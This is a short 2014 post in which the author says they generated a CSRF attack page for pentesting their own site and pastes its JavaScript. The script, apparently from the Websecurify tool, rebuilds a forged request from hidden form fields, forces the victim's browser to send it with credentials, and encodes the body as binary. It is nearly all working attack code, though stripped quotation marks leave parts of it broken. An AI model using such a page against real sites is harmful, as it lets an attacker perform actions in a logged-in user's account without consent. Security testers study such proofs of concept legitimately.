gENERATED #CSRF #attack on my web page for #pentest proportions Websecurify CSRF Attack Page: madkingwebdesign/ var body = atob(document.getElementById(body).value); // --- var xhr = new XMLHttpRequest(); // --- xhr.open(document.getElementById(method).value, document.getElementById(uri).value); // --- Array.prototype.slice.call(document.getElementById(headers).childNodes).forEach(function (element) { if (element.tagName != INPUT) { return; } // --- xhr.setRequestHeader(element.getAttribute(name), element.value); }); // --- xhr.withCredentials = true; // --- if (typeof(XMLHttpRequest.prototype.sendAsBinary) == function) { var temp = ; // --- for (var i = 0; i < body.length; i++) { temp += String.fromCharCode(body.charCodeAt(i) & 0xff); } // --- body = temp; } else { XMLHttpRequest.prototype.sendAsBinary = function (data) { var arrayData = new ArrayBuffer(data.length); var uint8ArrayData = new Uint8Array(arrayData, 0); // --- for (var i = 0; i < data.length; i++) { uint8ArrayData[i] = (data.charCodeAt(i) & 0xff); } // --- var BlobBuilder = window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder; // --- var blob; // --- if (BlobBuilder) { var blobBuilder = new BlobBuilder() // --- blobBuilder.append(arrayData); // --- blob = blobBuilder.getBlob(); } else { blob = new Blob([arrayData]); } // --- this.send(blob); } } // --- xhr.sendAsBinary(body);
Posted on: Wed, 15 Oct 2014 07:37:52 +0000
Trending Topics
Recently Viewed Topics
© 2015